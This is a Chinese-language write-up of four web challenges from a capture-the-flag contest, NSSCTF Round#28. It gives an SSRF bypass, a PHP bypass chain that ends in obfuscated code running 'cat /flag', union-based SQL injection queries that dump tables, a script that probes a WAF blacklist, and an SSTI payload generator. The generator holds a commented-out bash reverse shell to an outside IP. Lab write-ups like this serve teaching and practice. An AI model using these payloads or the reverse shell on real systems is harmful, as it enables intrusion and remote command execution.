NSSCTF Round#28 Team|web

前言：

跟polarCTF打的时间重了，打的时候也没发现只有三个小时，导致又是差一题没时间做，不然就ak了。最终得分972，排名23。比赛难度我感觉还是简单的，可惜就只有我一个人干了三题web，所以排名比较低。

ez_ssrf

描述：无

考点：ssrf

发现本地被禁用了，直接用@绕过就行。

?url=http://[email protected]/flag

ez_php

描述：无

考点：is_numeric()、md5数组绕过、文件包含php伪协议、自增绕过

根据代码分别绕过

GET: ?password=123456a
POST: file=php://filter/convert.base64-encode/resource=level2.php&a[]=1&b[]=2

解码level2.php的源码

自增绕过

GET: 1=system&2=cat /flag
POST: $_=[]._;$_3=$_[1];$_=$_[3];++$_;$_1=++$_;++$_;++$_;++$_;++$_;$_=$_1.++$_.$_3;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);

light_pink

描述：无

考点：sql注入

进入后用1\尝试sql注入，发现存在字符型注入

测一下列数（这里比赛的时候忘记截图了，赛后要花钱开靶场就算了）

?id=1' group by 5#

爆库名，这里-1没法用所以用0，并且只回显第3列和第4列

?id=0' union select 1,2,database(),4,5#

爆表名，这里又发现=被过滤了，用like绕过

?id-0' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema like 'nss_board'#

爆列名

?id=0' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name like 'Cute'#

得到flag

?id=0' union select 1,2,group_concat(id,Happy),4,5 from Cute#

Coding Loving

描述：Code Audit

考点：ssti黑名单绕过

下载题目的附件源码

可以发现访问test路由后，post传参可能存在ssti

尝试一下发现确实存在注入点但是有waf

这题是黑盒，所以用脚本测一下黑名单

import requests
from time import sleep

blacklist_chars = []  # 被过滤的字符
whitelist_chars = []  # 允许的字符
blacklist_keywords = []  # 被过滤的关键字
test_keywords = ['read', 'class', 'base', 'init', 'config', 'lipsum', 'globals', 'getitem', 'subclasses', 'mro',
                 'import', 'eval', 'exec', 'os', 'system', 'popen', 'request', 'attr']


def ascii_str():  # 生成所有可显示ASCII字符
    return [chr(i) for i in range(33, 127)]


def check_char(char):
    """测试单个字符是否被过滤"""
    try:
        response = requests.post(
            url,
            data={"cmd": char},
            cookies=session_cookie,
            timeout=5
        )
        if error_str in response.text:
            blacklist_chars.append(char)
        else:
            whitelist_chars.append(char)
    except Exception as e:
        print(f"Error testing char '{char}': {e}")


def check_keyword(keyword):
    """测试关键字是否被过滤"""
    try:
        # 测试多种形式的注入尝试
        test_cases = [keyword]

        for case in test_cases:
            response = requests.post(
                url,
                data={"cmd": case},
                cookies=session_cookie,
                timeout=5
            )
            if error_str in response.text:
                blacklist_keywords.append(keyword)
                return  # 只要有一种形式被拦截就记录
            sleep(0.2)  # 避免请求过快被封锁

    except Exception as e:
        print(f"Error testing keyword '{keyword}': {e}")


def waf_check():
    """执行WAF检测"""
    print("开始检测被过滤的字符...")
    str_list = ascii_str()
    for char in str_list:
        check_char(char)
        sleep(0.1)  # 降低请求频率
    print(f"被过滤的字符: {''.join(blacklist_chars)}")

    print("\n开始检测被过滤的关键字...")
    for keyword in test_keywords:
        check_keyword(keyword)
    print(f"被过滤的关键字: {', '.join(blacklist_keywords)}")

    final_blacklist = blacklist_chars + blacklist_keywords
    print("\n黑名单:")
    print(final_blacklist)

if __name__ == '__main__':
    url = "http://node6.anna.nssctf.cn:21208/test"
    error_str = "<h1>检测到输入非法字符</h1>"
    session_cookie = {'session': 'eyJ1c2VyIjoidGVzdCJ9.Z-FOEQ._CEeZlZlsDf49DCXK1gxLkAo_HE'}
    waf_check()

直接fengjing一把梭

from fenjing import exec_cmd_payload, config_payload
import logging
logging.basicConfig(level = logging.INFO)

def waf(s: str):
    blacklist =  ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'g', '%', '_', '.', '/', 'read', 'config', 'globals', 'getitem']
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    # shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/38.12.42.163/7777 0>&1\"")
    shell_payload, _ = exec_cmd_payload(waf, "whoami")
    print(f"{shell_payload=}")

获取flag